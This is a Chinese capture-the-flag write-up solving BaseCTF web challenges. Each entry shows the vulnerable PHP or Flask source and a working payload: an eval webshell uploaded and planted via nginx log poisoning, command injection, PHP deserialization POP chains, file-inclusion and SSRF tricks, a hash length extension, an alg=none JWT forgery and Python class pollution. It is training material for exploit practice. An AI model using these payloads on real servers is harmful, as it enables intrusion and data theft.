A Dark Room
直接查看源代码,注释里有flag
HTTP是什么呀
bp
抓包改http
参数
POST /?basectf=we1c%2500me HTTP/1.1
Host: challenge.basectf.fun:33834
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
X-Forwarded-For:127.0.0.1
Referer:Base
User-Agent:Base
Cookie:c00k13=i can't eat it
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 9
Base=fl@g
会得到以下内容,base64
解码即可
HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Thu, 15 Aug 2024 07:05:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.27
Location: success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==
Content-Length: 0
客户端重定向:
- 服务器在响应中返回一个带有302状态码的响应头,指示浏览器进行跳转。
- 例如,服务器端脚本通过
header("Location: success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==");
指令将HTTP响应状态设置为302,然后浏览器会自动访问success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==
页面。
喵喵喵
<?php
// Echoes this file's own source into the response, so the code text below is part of the output.
highlight_file(__FILE__);
error_reporting(0);
// NOTE(review): a raw query parameter is passed straight to eval() — code execution from
// untrusted input. There is no validation or allow-list anywhere in this file; eval() on
// request data has no safe form and should be removed rather than filtered.
$a = $_GET['DT'];
eval($a);
?>
get
传参给eval
执行,直接传system('cat /flag');
,即url?DT=system('cat /flag');
EncirclingGame
A simple game, enjoy it and get the flag when you complete it.
纯游戏题,通关得到flag
upload
文件上传漏洞,没有检测文件类型,直接传个木马,然后蚁剑连接
test.php
:
<?php @eval($_POST['pass']);?>
Aura酱的礼物
data
伪协议 ssrf
文件包含
<?php
// Echoes this file's own source into the response.
highlight_file(__FILE__);
// Aura, welcome home~
// There is a gift here, please sign for it~
// NOTE(review): $pen is a request value used as a file_get_contents() target, so any path or
// stream wrapper the PHP build supports can be read; only the returned content is compared.
$pen = $_POST['pen'];
if (file_get_contents($pen) !== 'Aura')
{
die('这是 Aura 的礼物,你不是 Aura!');
}
// Gift received, next go and write your thoughts on the blog~
// strpos(...) !== 0 is a prefix check only: it pins the first characters of $challenge,
// not the host that file_get_contents() will actually contact. Parse the URL and compare host.
$challenge = $_POST['challenge'];
if (strpos($challenge, 'http://jasmineaura.github.io') !== 0)
{
die('这不是 Aura 的博客!');
}
$blog_content = file_get_contents($challenge);
if (strpos($blog_content, '已经收到Kengwang的礼物啦') === false)
{
die('请去博客里面写下感想哦~');
}
// Hehe, time to unwrap the gift; a little secret: the gift is inside flag.php~
// NOTE(review): include() of a request-controlled path is the local-file-inclusion sink;
// the fix is a fixed include or an allow-list of includable names, not a deny-list.
$gift = $_POST['gift'];
include($gift);
post
参数:pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@challenge.basectf.fun:21758/&gift=php://filter/convert.base64-encode/resource=flag.php
一起吃豆豆
index.js
里有一行context.fillText(_LIFE ? atob("QmFzZUNURntKNV9nYW0zXzFzX2Vhc3lfdDBfaDRjayEhfQ==") : 'GAME OVER', this.x, this.y);,base64
解码得到flag
你听不到我的声音
系统命令执行,不会直接显示,所以放到其他文件里再访问文件:cmd=cat /flag > ./1.txt
shell_exec($_POST['cmd']);
easy_ser
源码
<?php
// Echo this file's own source, then silence all PHP diagnostics for the rest of the request.
highlight_file(__FILE__);
error_reporting(0);
class re{
public $chu0;
// Magic method: runs whenever an instance is cast to string (echo, concatenation, ...).
public function __toString(){
if(!isset($this->chu0)){
return "I can not believes!";
}
// $nononono is never defined (null), so an undefined property is looked up on $chu0;
// when $chu0 defines __get(), that method is what runs. No string is returned on this
// path, which PHP presumably reports as an error — but only after the access has happened.
$this->chu0->$nononono;
}
}
class web {
public $kw;
public $dt;
// Runs on unserialize(); the concatenation casts $kw to string, so an object stored in $kw
// has its __toString() invoked here.
public function __wakeup() {
echo "lalalla".$this->kw;
}
// Runs when the object is released.
public function __destruct() {
echo "ALL Done!";
}
}
class pwn {
public $dusk;
public $over;
// Magic getter: invoked for any undefined/inaccessible property read on a pwn instance.
public function __get($name) {
// Loose != comparison; the message is informational only — execution continues either way.
if($this->dusk != "gods"){
echo "什么,你竟敢不认可?";
}
// Calls getflag() on whatever object $over holds; with unserialize() input that object is
// chosen by the client.
$this->over->getflag();
}
}
class Misc {
public $nothing;
public $flag;
// Dangerous sink: eval() of a fixed string that shells out to read /flag.
public function getflag() {
eval("system('cat /flag');");
}
}
class Crypto {
// Decoy class: shares Misc's method name but only prints.
public function __wakeup() {
echo "happy happy happy!";
}
public function getflag() {
echo "you are over!";
}
}
// NOTE(review): unserialize() of a raw query parameter lets the client pick which classes are
// instantiated and what their properties hold, so the magic methods above run on attacker data.
// Use json_decode() for data interchange, or at minimum unserialize($ser, ['allowed_classes' => false]).
$ser = $_GET['ser'];
unserialize($ser);
?>
exp
<?php
class re{
public $chu0;
// Local copy of the target's class: only the class name and property layout matter for
// serialize(); the method body is never executed by this generator.
public function __toString(){
if(!isset($this->chu0)){
return "I can not believes!";
}
$this->chu0->$nononono;
}
}
class web {
public $kw;
public $dt;
// Local copy of the target's class; $kw is the string-cast point on the target, nothing runs here.
public function __wakeup() {
echo "lalalla".$this->kw;
}
public function __destruct() {
echo "ALL Done!";
}
}
class pwn {
public $dusk;
public $over;
// Local copy of the target's class; kept only so serialize() emits matching property names.
public function __get($name) {
if($this->dusk != "gods"){
echo "什么,你竟敢不认可?";
}
$this->over->getflag();
}
}
class Misc {
public $nothing;
public $flag;
// Stub: the target's getflag() body is replaced by a plain echo so running this generator
// locally has no side effects.
public function getflag() {
echo "getflag";
}
}
// Object graph mirroring the target's magic-method chain: web::__wakeup string-casts $kw (re),
// re::__toString reads an undefined property on $chu0 (pwn), pwn::__get calls getflag() on $over (Misc).
$re = new re();
$pwn = new pwn();
$web = new web();
$misc = new Misc();
$pwn->dusk = "gods";
$pwn->over = $misc;
$re->chu0 = $pwn;
$web->kw = $re;
// Print the serialized graph; the resulting string is quoted on the next line of the writeup.
$res = serialize($web);
echo $res;
最终构造:O:3:"web":2:{s:2:"kw";O:2:"re":1:{s:4:"chu0";O:3:"pwn":2:{s:4:"dusk";s:4:"gods";s:4:"over";O:4:"Misc":2:{s:7:"nothing";N;s:4:"flag";N;}}}s:2:"dt";N;}
RCEisamazingwithspace
绕过空格:cmd=cat${IFS}/flag
Really EZ POP
源码
<?php
highlight_file(__FILE__);
class Sink
{
private $cmd = 'echo 123;';
// Dangerous sink: eval() of a property value. Being private does not protect it — unserialize()
// restores private members straight from the payload (encoded as "\0Sink\0cmd").
public function __toString()
{
eval($this->cmd);
}
}
class Shark
{
private $word = 'Hello, World!';
// Runs when an instance is called like a function; the concatenation casts $word to string,
// so an object stored there has its __toString() invoked.
public function __invoke()
{
echo 'Shark says:' . $this->word;
}
}
class Sea
{
public $animal;
// Magic getter for undefined properties: treats $animal as a callable and invokes it.
public function __get($name)
{
$sea_ani = $this->animal;
echo 'In a deep deep sea, there is a ' . $sea_ani();
}
}
class Nature
{
public $sea;
// Runs on object release: reading the undefined property ->see on $sea triggers that object's __get().
public function __destruct()
{
echo $this->sea->see;
}
}
// NOTE(review): unserialize() on a POST field — the client controls the object graph and thus
// which of the magic methods above fire. The truthiness test also treats "0" as absent;
// use isset() and json_decode() (or 'allowed_classes' => false) instead.
if ($_POST['nature']) {
$nature = unserialize($_POST['nature']);
}
exp
<?php
class Sink
{
private $cmd = 'echo 123;';
// Solver-added setter: the only way to populate the private property from outside the class.
public function setPrivateVar($res) {
$this->cmd = $res;
}
// Copied from the target; never executed by this generator.
public function __toString()
{
eval($this->cmd);
}
}
class Shark
{
private $word = 'Hello, World!';
// Solver-added setter for the private property.
public function setPrivateVar($res) {
$this->word = $res;
}
// Copied from the target; not run here.
public function __invoke()
{
echo 'Shark says:' . $this->word;
}
}
class Sea
{
public $animal;
// Local copy of the target's class; only the property layout matters for serialize().
public function __get($name)
{
$sea_ani = $this->animal;
echo 'In a deep deep sea, there is a ' . $sea_ani();
}
}
class Nature
{
public $sea;
// Local copy of the target's class; the destructor is the chain's entry point on the target.
public function __destruct()
{
echo $this->sea->see;
}
}
// Wire the graph: Nature::__destruct -> Sea::__get -> Shark::__invoke -> Sink::__toString -> eval.
$Sink = new Sink();
$Nature = new Nature();
$Sea = new Sea();
$Shark = new Shark();
$Sink->setPrivateVar("system('cat /flag');");
$Nature->sea = $Sea;
$Sea->animal = $Shark;
$Shark->setPrivateVar($Sink);
// Print the serialized graph; private names come out with \0 bytes that must be URL-encoded
// (%00) when sent, as the writeup notes below.
$res = serialize($Nature);
echo $res;
发过去的序列化内容中,私有属性的名称要写成 \x00类名\x00属性名 的形式(即在类名和属性名前各加一个 \x00)
,最终发送nature=O:6:"Nature":1:{s:3:"sea";O:3:"Sea":1:{s:6:"animal";O:5:"Shark":1:{s:11:"%00Shark%00word";O:4:"Sink":1:{s:9:"%00Sink%00cmd";s:20:"system('cat /flag');";}}}}
关于非公有字段名称:
private
使用: 私有的类的名称 (考虑到继承的情况) 和字段名组合\x00类名称\x00字段名
protected
使用:*
和字段名组合\x00*\x00字段名
数学大师
从网页中用正则提取算式,计算后以 answer 参数 POST 回去,需要保持 session cookie
import requests
import re
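def extract_and_calculate(expression):
    """Find the first ``<int> <op> <int>`` expression in ``expression`` and evaluate it.

    ``÷`` and ``×`` are normalised to ``/`` and ``*``. Returns the numeric result (a float
    for division, as before), or a human-readable error string when no expression is found
    or the operator is not one of ``+ - * /``.
    """
    pattern = r'(\d+)\s*([+\-*/÷×]+)\s*(\d+)'
    match = re.search(pattern, expression)
    if not match:
        return "No valid expression found."
    num1, op, num2 = match.groups()
    op = op.replace('÷', '/').replace('×', '*')
    # Dispatch table instead of eval(): the text comes from an HTTP response body, so
    # nothing fetched from the network is ever interpreted as Python code.
    ops = {
        '+': lambda a, b: a + b,
        '-': lambda a, b: a - b,
        '*': lambda a, b: a * b,
        '/': lambda a, b: a / b,
    }
    try:
        return ops[op](int(num1), int(num2))
    except KeyError:
        return f"Error in calculation: unsupported operator {op!r}"
    except Exception as e:
        return f"Error in calculation: {str(e)}"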
# Script body: a single Session keeps the server's cookie across the 50 rounds. Pure I/O.
# int() on an error string from extract_and_calculate() raises ValueError and ends the run.
# Indentation was lost in extraction; print() is most plausibly inside the loop — confirm.
session = requests.Session()
url = 'http://challenge.basectf.fun:29707'
response = session.get(url).text
for i in range(50):
    res = int(extract_and_calculate(response))
    post_data = {
        'answer': res
    }
    response = session.post(url, data=post_data).text
    print(response)
所以你说你懂md5?
利用hash-ext-attack
工具进行哈希长度扩展
python3 hash_ext_attack.py
2024-09-10 20:53:46.493 | DEBUG | common.md5_manual:__init__:17 - init......
请输入已知明文:
请输入已知hash: 82cb3db8069266aecdc0d3cdabb4b460
请输入扩展字符: admin
请输入密钥长度:96
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:65 - 已知明文:b''
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:66 - 已知hash:b'82cb3db8069266aecdc0d3cdabb4b460'
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:68 - 新明文:b'\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00admin'
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:69 - 新明文(url编码):%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:71 - 新hash:e7e7b8375abc6096501a68bbd0e3f662
发送http内容
POST / HTTP/1.1
Host: challenge.basectf.fun:49521
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Cookie:PHPSESSID=1gtcjs8kgqmltafgpn6cncugfv
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 522
apple[]=24&banana[]=2&appple=240610708&bananana=QNKCDZO&banananana=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&apppple=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&name=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin&md5=e7e7b8375abc6096501a68bbd0e3f662
flag直接读取不就行了?
php
原生类的利用
<?php
highlight_file('index.php');
# I hid the flag inside a secret folder, so you need to learn how to list directories~
error_reporting(0);
$J1ng = $_POST['J'];
$Hong = $_POST['H'];
$Keng = $_GET['K'];
$Wang = $_GET['W'];
# NOTE(review): the class name and the constructor argument both come from the request, so any
# loaded class can be instantiated with a caller-chosen argument (the writeup uses built-in SPL
# classes). Restrict $Keng and $J1ng to an allow-list of class names.
$dir = new $Keng($Wang);
foreach($dir as $f) {
echo($f . '<br>');
}
# Same pattern again; echo casts the new object to string (its __toString()).
echo new $J1ng($Hong);
?>
访问http://challenge.basectf.fun:27459/?K=DirectoryIterator&W=/
,发现根目录下有secret
,访问http://challenge.basectf.fun:27459/?K=DirectoryIterator&W=/secret
发现f11444g.php
,发送post
请求
J=SplFileObject&H=/secret/f11444g.php
网页看不到,直接查看源代码
</code>.<br>..<br>f11444g.php<br><?php BaseCTF{640a9b0d-3b98-4d44-8164-a1113b9ec49f} ?>
滤个不停
文件
<?php
highlight_file(__FILE__);
error_reporting(0);
$incompetent = $_POST['incompetent'];
$Datch = $_POST['Datch'];
if ($incompetent !== 'HelloWorld') {
die('写出程序员的第一行问候吧!');
}
// What on earth is this???
// Each of these characters must occur somewhere in $Datch — a presence check, not a format check.
$required_chars = ['s', 'e', 'v', 'a', 'n', 'x', 'r', 'o'];
$is_valid = true;
foreach ($required_chars as $char) {
if (strpos($Datch, $char) === false) {
$is_valid = false;
break;
}
}
if ($is_valid) {
// Deny-list of stream-wrapper prefixes. NOTE(review): plain filesystem paths are not covered,
// so include() below still accepts any readable local file; an allow-list of names is the fix.
$invalid_patterns = ['php://', 'http://', 'https://', 'ftp://', 'file://' , 'data://', 'gopher://'];
foreach ($invalid_patterns as $pattern) {
if (stripos($Datch, $pattern) !== false) {
die('此路不通换条路试试?');
}
}
include($Datch);
} else {
die('文件名不合规 请重试');
}
?>
payload:incompetent=HelloWorld&Datch=/var/log/nginx/access.log,user agent中添加<?php @eval($_POST['pass']);?>
访问/var/log/nginx/access.log
发送incompetent=HelloWorld&Datch=/var/log/nginx/access.log&pass=system('cat /flag');
得到
10.32.0.0 - - [13/Sep/2024:00:20:54 +0800] "GET / HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:55 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:58 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:58 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:21:02 +0800] "GET /%3C?php%20phpinfo();?%3E HTTP/1.1" 200 5478 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:21:02 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/%3C?php%20phpinfo();?%3E" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:24:36 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:24:37 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:26:13 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27" "-" 10.32.0.0 - - [13/Sep/2024:00:27:12 
+0800] "POST / HTTP/1.1" 200 7391 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:13 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:26 +0800] "POST / HTTP/1.1" 200 5467 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:27 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:30 +0800] "POST / HTTP/1.1" 200 8321 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:31 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:28:08 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" "-" 10.32.0.0 - - [13/Sep/2024:00:28:32 +0800] "POST / HTTP/1.1" 200 8935 "http://challenge.basectf.fun:30015/" "BaseCTF{a0fd8763-8a3b-4bc5-b430-f09a213482e3} " "-" 10.32.0.0 - - [13/Sep/2024:00:28:33 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:30:27 +0800] "POST / HTTP/1.1" 200 9332 
"http://challenge.basectf.fun:30015/" "BaseCTF{a0fd8763-8a3b-4bc5-b430-f09a213482e3} " "-" 10.32.0.0 - - [13/Sep/2024:00:30:28 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:30:43 +0800] "GET / HTTP/1.1" 200 5478 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" "-" 10.32.0.0 - - [13/Sep/2024:00:30:46 +0800] "\x16\x03\x01\x00\xD2\x01\x00\x00\xCE\x03\x03\xC25 \xAE\x14'\xE9\x9C\x84\xF1\xB3\xDD\xE3\x09h\x98.\x10\x86\x16\xECn4\x10\xE7\xB3!r\xBA\x1BB\xA2\x00\x00b\xC00\xC0,\xC0/\xC0+\x00\x9F\x00\x9E\xC02\xC0.\xC01\xC0-\x00\xA5\x00\xA1\x00\xA4\x00\xA0\xC0(\xC0$\xC0\x14\xC0" 400 157 "-" "-" "-"
no jwt
源码
from flask import Flask, request, jsonify
import jwt
import datetime
import os
import random
import string
app = Flask(__name__)
# Randomly generate secret_key at start-up. NOTE(review): random.choices is not a CSPRNG;
# for key material use secrets.token_hex() (or load the key from configuration).
app.secret_key = ''.join(random.choices(string.ascii_letters + string.digits, k=16))
# 登录接口
@app.route('/login', methods=['POST'])
def login():
    """Issue an HS256 token for any posted username; the password is read but never checked."""
    # request.json is None for non-JSON bodies, so .get() would raise — presumably acceptable here.
    data = request.json
    username = data.get('username')
    password = data.get('password')
    # Every other user is given the user role
    token = jwt.encode({
        'sub': username,
        'role': 'user',  # ordinary-user role
        'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)
    }, app.secret_key, algorithm='HS256')
    return jsonify({'token': token}), 200
# flag 接口
@app.route('/flag', methods=['GET'])
def flag():
    """Return /flag to callers whose bearer token carries role == 'admin'."""
    token = request.headers.get('Authorization')
    if token:
        try:
            # NOTE(review): verify_signature=False means the claims are taken on trust — the
            # role checked below is whatever the client wrote, and the ExpiredSignatureError /
            # InvalidTokenError handlers below can never fire. The verifying form is
            # jwt.decode(tok, app.secret_key, algorithms=['HS256']). split(" ")[1] also
            # raises IndexError for a header without a space.
            decoded = jwt.decode(token.split(" ")[1], options={"verify_signature": False, "verify_exp": False})
            # Check whether the user's role is admin
            if decoded.get('role') == 'admin':
                with open('/flag', 'r') as f:
                    flag_content = f.read()
                return jsonify({'flag': flag_content}), 200
            else:
                return jsonify({'message': 'Access denied: admin only'}), 403
        except FileNotFoundError:
            return jsonify({'message': 'Flag file not found'}), 404
        except jwt.ExpiredSignatureError:
            return jsonify({'message': 'Token has expired'}), 401
        except jwt.InvalidTokenError:
            return jsonify({'message': 'Invalid token'}), 401
    return jsonify({'message': 'Token is missing'}), 401
if __name__ == '__main__':
    # debug=True enables the Werkzeug interactive debugger and reloader — never for a
    # network-reachable deployment.
    app.run(debug=True)
向login
中发送post
数据得到token
验证后的jwt
格式,把role
改成admin
生成jwt token
import jwt  # import the PyJWT package
# Builds a token with alg=none, i.e. no signature at all. A verifier that pins its
# accepted algorithms (algorithms=['HS256']) rejects such tokens outright.
# payload
token_dict = {
    "sub": "admin",  # use None rather than null
    "role": "admin",
}
headers = {
    "alg": "none",
    "typ": "JWT"
}
# use PyJWT's encode method
jwt_token = jwt.encode(token_dict, "", algorithm="none", headers=headers)
print(jwt_token)
以Bearer
方案发送认证数据
import requests
# Assume you already have a JWT (the alg=none token produced above)
jwt_token = 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.'
# Target URL
url = 'http://challenge.basectf.fun:27209/flag'
# Send a GET request with the JWT in the Authorization header (Bearer scheme)
response = requests.get(url, headers={'Authorization': f'Bearer {jwt_token}'})
# Check the response
if response.status_code == 200:
    print('Success:', response.json())
else:
    print('Error:', response.status_code, response.text)
back to the future
githacker
得到git
源码直接git show
圣钥之战
提示可以去read
那里找一下flag
,访问/read
拿到源码
from flask import Flask,request
import json
app = Flask(__name__)
def merge(src, dst):
    """Recursively copy the JSON object ``src`` into ``dst`` (a dict or an arbitrary object).

    Targets with ``__getitem__`` are updated by key; any other object by attribute via
    setattr(). Nested dicts recurse into the existing value.
    NOTE(review): keys are not filtered, so dunder names such as ``__init__`` and
    ``__globals__`` are followed and assigned like any other — which is how a request body can
    reach module globals (see the payload further down). Rejecting keys that start with ``__``,
    or merging only into plain dicts, closes this.
    """
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            # Recurse only when the existing value is truthy and the new value is a dict.
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
def is_json(data):
    """Return True when ``data`` parses as JSON, False on a decode error (ValueError)."""
    try:
        json.loads(data)
    except ValueError:
        return False
    return True
class cls():
    """Empty placeholder type; its single instance is the merge() target for /pollute."""
    def __init__(self):
        pass
instance = cls()
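@app.route('/', methods=['GET', 'POST'])
def hello_world():
    """Serve the static landing page.

    The file is opened in a ``with`` block so the handle is closed after reading
    (the original left it to the garbage collector).
    """
    with open('/static/index.html', encoding="utf-8") as page:
        return page.read()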
@app.route('/read', methods=['GET', 'POST'])
def Read():
    # Returns the contents of whatever the module-global __file__ currently names — normally
    # this source file, but merge() can reassign that global. The handle is never closed.
    # NOTE(review): the literal below appears to have lost its triple quotes in extraction;
    # as printed it does not parse. Treat the lines through the closing quote as one string.
    file = open(__file__, encoding="utf-8").read()
    return f"J1ngHong说:你想read flag吗?
那么圣钥之光必将阻止你!
但是小小的源码没事,因为你也读不到flag(乐)
{file}
"
@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():
    """Merge a JSON request body into the module-level ``instance`` via merge(); no schema check."""
    if request.is_json:
        # json.loads on the raw body; merge() then walks every key, dunders included.
        merge(json.loads(request.data),instance)
    else:
        return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"
    return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"
if __name__ == '__main__':
    # Binds on all interfaces, port 80.
    app.run(host='0.0.0.0',port=80)
python
原型链污染__file__
为flag
,发送post
数据
{"__init__":{"__globals__":{"__file__":"/flag"}}}
玩原神玩的
源码
<?php
highlight_file(__FILE__);
error_reporting(0);
include 'flag.php';
// Only element counts are compared (loosely), so any POST array with as many entries as $array
// passes; $array itself is expected to be defined by flag.php, which is not shown here.
if (sizeof($_POST['len']) == sizeof($array)) {
ys_open($_GET['tip']);
} else {
die("错了!就你还想玩原神?❌❌❌");
}
// Gate on a GET value before dumping the flag. Loose != is used, so values that merely compare
// equal (rather than being identical) also pass.
function ys_open($tip) {
if ($tip != "我要玩原神") {
die("我不管,我要玩原神!😭😭😭");
}
dumpFlag();
}
// Emits the flag as a JSON list of one MD5 digest per character. Requires exactly two POST values
// m[0] and m[1], with m[0] equal to "100%" and m[1] equal to "love100%" . md5(m[0]) (loose compares).
function dumpFlag() {
if (!isset($_POST['m']) || sizeof($_POST['m']) != 2) {
die("可恶的QQ人!😡😡😡");
}
$a = $_POST['m'][0];
$b = $_POST['m'][1];
if(empty($a) || empty($b) || $a != "100%" || $b != "love100%" . md5($a)) {
die("某站崩了?肯定是某忽悠干的!😡😡😡");
}
include 'flag.php';
// Creates $flag with an empty array at index 0; the loop's first pass overwrites it (when $array is non-empty).
$flag[] = array();
// md5 of (byte XOR position): each position has only 256 possible inputs, so this is
// obfuscation rather than protection — it is trivially inverted by enumeration.
for ($ii = 0;$ii < sizeof($array);$ii++) {
$flag[$ii] = md5(ord($array[$ii]) ^ $ii);
}
echo json_encode($flag);
}
len
数组的长度要和array
一样,爆破array
的长度为45
,源码给出了m
数组的内容
最后得到flag
的数组,每一位进行md5
,直接爆破md5
php
的数组:len[]=0&len[]=1&len[]=2&len[]=3&len[]=4
(拼接
爆破md5
import hashlib
# One MD5 digest per flag byte, as emitted by dumpFlag(): md5(str(ord(c) ^ index)).
